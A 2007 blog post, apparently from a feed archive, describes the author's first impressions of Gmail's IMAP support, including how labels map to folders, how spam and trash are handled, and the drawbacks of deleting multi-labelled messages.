Gmail with IMAP — First Impressions http://www.semanticoverload.com/2007/11/04/gmail-with-imap-first-impressions/ http://www.semanticoverload.com/2007/11/04/gmail-with-imap-first-impressions/#comments Mon, 05 Nov 2007 04:56:57 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=132 Finally, over a week and a half after the initial announcement, IMAP was finally enabled on all my Gmail accounts. Until now I used POP to access my emails from gmail, and had to use the ‘recent:’ option to be able to access my emails from multiple locations. With IMAP, thankfully, that will change soon.

A quick intro to IMAP. As described by Tom Spring from PC World:

IMAP is geek speak for Internet Message Access Protocol. ….
… with IMAP any changes (sorting, deleting, reading, or otherwise) are reflected across all Gmail interfaces – be it using Outlook Express, your iPhone, or Web-based Gmail. For example if you create a folder and sort messages into it using your desktop Outlook Express client those changes show up on Web-based Gmail.

IMAP is a boon for people like me, who check their emails from multiple locations. So I decided to give IMAP support on Gmail a spin, and here’s what I came up with:

For starts Gmail has done a remarkable job of supporting IMAP. I can understand the technical difficulty in being able to support IMAP on Gmail. Think about it: Gmail moved away from conventional folder based email organization to offer what is essentially a tag-based (label-based) organization of email (although their tagging interface is too cumbersome in my opinion). Given that IMAP is a folder-based email access protocol, reconciling the two is not an easy task. But Google has done a good job of it this time around.

For starts, after you enable IMAP, and configure your mail client there are changes that you will notice in the web-based Gmail interface.

  • All the folders that you create using your email client will now appear as labels in your web interface.
  • Certain labels like Trash, or Chats are reserved by gmail. If you try to create a folder by that name, then the folder will appear as ‘[imap]/foldername’
  • If you have any label of form ‘text1/text2′, they will now appear as folder ‘text2′ being a subfolder of folder ‘text1′. So If you have any labels of the form ‘family/friend’, or ‘work/spam’, consider renaming them without a ‘/’ before enabling IMAP.

So how did tag-based Gmail reconcile with folder-based IMAP?

  • Each label appears as a separate folder in IMAP.
  • To apply multiple labels, just copy the email to multiple folders.
  • Moving an email from one folder to another will change the label on the email from the first label to the other.
  • If you move an email to a sub-folder ‘sub’ within a main folder ‘main’, on the web interface, it will show up as being labeled ‘main/sub’.
  • If you configure you mail client to sent email using gmail’s smtp server, then every copy of the email is stoed in the ‘[Gmail]/Sent Mail’ folder.

Here are the set of IMAP actions and their corresponding web based Gmail actions.

Spam, however, is handled differently. To mark a message as spam, just move it to the ‘[gmail]/spam’ folder in the IMAP interface. Simply marking the email as ‘spam’ on your mail client (like Thunderbird) will trigger the email client’s spam filters, but not Gmail’s.

Drawbacks

  • One The only major drawback is that the IMAP’s default trash folder is different from Gmail’s Trash folder. There’s no easy way to fix it. The only fix that I found to work for Thunderbird is here on Tech Samurai. It not the most straight forward config change to make Thunderbird to GMail’s Trash folder.
  • The bigger issue with the simulation of folder-based structure on top of tag-based structure is the following:
    If an email has multiple tags (labels) associated with it, then the email shows up in multiple folders on the IMAP client. ‘Deleting’ such an email involves deleting (or moving to [Gmail]/Trash) all the virtual copies of the email from all the folders where they reside. This can be a arduous task, especially if do not know all the labels that were applied to the message to begin with (and you dont, if you are using the IMAP interface exclusively.

Overall, a really clean and neat implementation on Google’s part. Good job Google!

]]>
http://www.semanticoverload.com/2007/11/04/gmail-with-imap-first-impressions/feed/ 0